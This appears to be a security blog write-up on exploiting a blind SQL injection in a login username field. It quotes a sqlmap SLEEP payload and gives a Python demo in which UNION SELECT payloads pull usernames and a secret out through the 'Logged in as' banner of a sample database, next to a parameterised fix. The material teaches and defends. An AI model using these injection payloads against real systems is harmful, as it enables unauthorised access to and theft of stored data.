Blind SQL Injection Alternative

Bengsky
2 min read · Aug 6, 2023


Introduction

In this write-up, we explore an alternative approach to exploiting a blind SQL injection, one that targets the username stored in the session. The objective is to describe a technique for dumping data from a blind SQL injection effectively, rather than extracting it through timing alone.

SQLMAP Detection

During testing, SQLMAP detected and exploited the vulnerability as a time-based blind SQL injection on the username parameter of the login request. Here is an excerpt from its detection report:

```
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=' AND (SELECT 2574 FROM (SELECT(SLEEP(5)))IDrj) AND 'sJLy'='sJLy&password=123
```

Requirement:

For a comprehensive understanding of the requirements, please refer to the analysis provided on

Exploiting the Vulnerability:

Upon analyzing the requirements, we observed that the response displays “Logged in as admin”.

By replacing “admin” in the payload with any string, we demonstrated that the injection lets us set the username to anything we like. This works because the username stored in the session is taken directly from the row returned by the SQL query, so a second payload placed in the USERNAME column has its result reflected back in the response, turning the time-based blind injection into one whose output we can read directly.
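To make the mechanism concrete, here is an added example that is not the author's code or target: a minimal login routine in Python backed by an in-memory SQLite database with a constructed `users` table and a constructed `flags` table (the table and column names are assumptions; the page does not name them). The SQLMAP report above identifies the real backend as MySQL; the UNION payloads below use only syntax shared by both engines. The vulnerable function sets the session banner from the username column of the first returned row, so a UNION SELECT can place any subquery result in that column and read it back in-band, which is what turns the time-based blind injection into a direct dump. The parameterised version alongside it shows the fix.

```python
import sqlite3

BANNER_PREFIX = "Logged in as "


def setup_db():
    """Constructed sample database standing in for the target's MySQL backend.
    Table and column names are assumptions; the write-up does not name them."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!');
        INSERT INTO users VALUES (2, 'bob', 'hunter2');
        CREATE TABLE flags (secret TEXT);
        INSERT INTO flags VALUES ('flag{constructed-sample-secret}');
        """
    )
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable login: user input is concatenated into the query, and the session
    username is whatever the USERNAME column of the first returned row contains.
    That second property is what lets the injection become in-band."""
    sql = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    if row is None:
        return None  # login failed: no row, no session
    return BANNER_PREFIX + str(row[1])


def login_fixed(conn, username, password):
    """Hardened login: bound parameters, so the input is only ever compared
    against the username column and is never parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    if row is None:
        return None
    return BANNER_PREFIX + str(row[1])


def extract_via_username(conn, subquery):
    """Dump data through the session username instead of through timing.
    The UNION adds one row whose username column is the result of `subquery`;
    the trailing '-- ' (with a space, so MySQL accepts it too) comments out the
    rest of the original WHERE clause. The value then comes back in the banner."""
    payload = f"' UNION SELECT 1, ({subquery}) -- "
    banner = login_vulnerable(conn, payload, "123")
    if banner is None or not banner.startswith(BANNER_PREFIX):
        return None
    return banner[len(BANNER_PREFIX):]


if __name__ == "__main__":
    conn = setup_db()
    # Arbitrary string in the session, as in the write-up: "Logged in as anything"
    print(login_vulnerable(conn, "' UNION SELECT 1, 'anything' -- ", "123"))
    # One request per value instead of one request per bit with SLEEP()
    print(extract_via_username(conn, "SELECT group_concat(username) FROM users"))
    print(extract_via_username(conn, "SELECT secret FROM flags"))
    # The same payload against the parameterised query simply fails to log in
    print(login_fixed(conn, "' UNION SELECT 1, 'anything' -- ", "123"))
```

Each call to `extract_via_username` retrieves a whole value in a single request, where the SLEEP-based approach needs one request per character or bit. Against a real MySQL target the column count in the UNION has to match the original SELECT, and functions such as `GROUP_CONCAT` are available under the same name.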
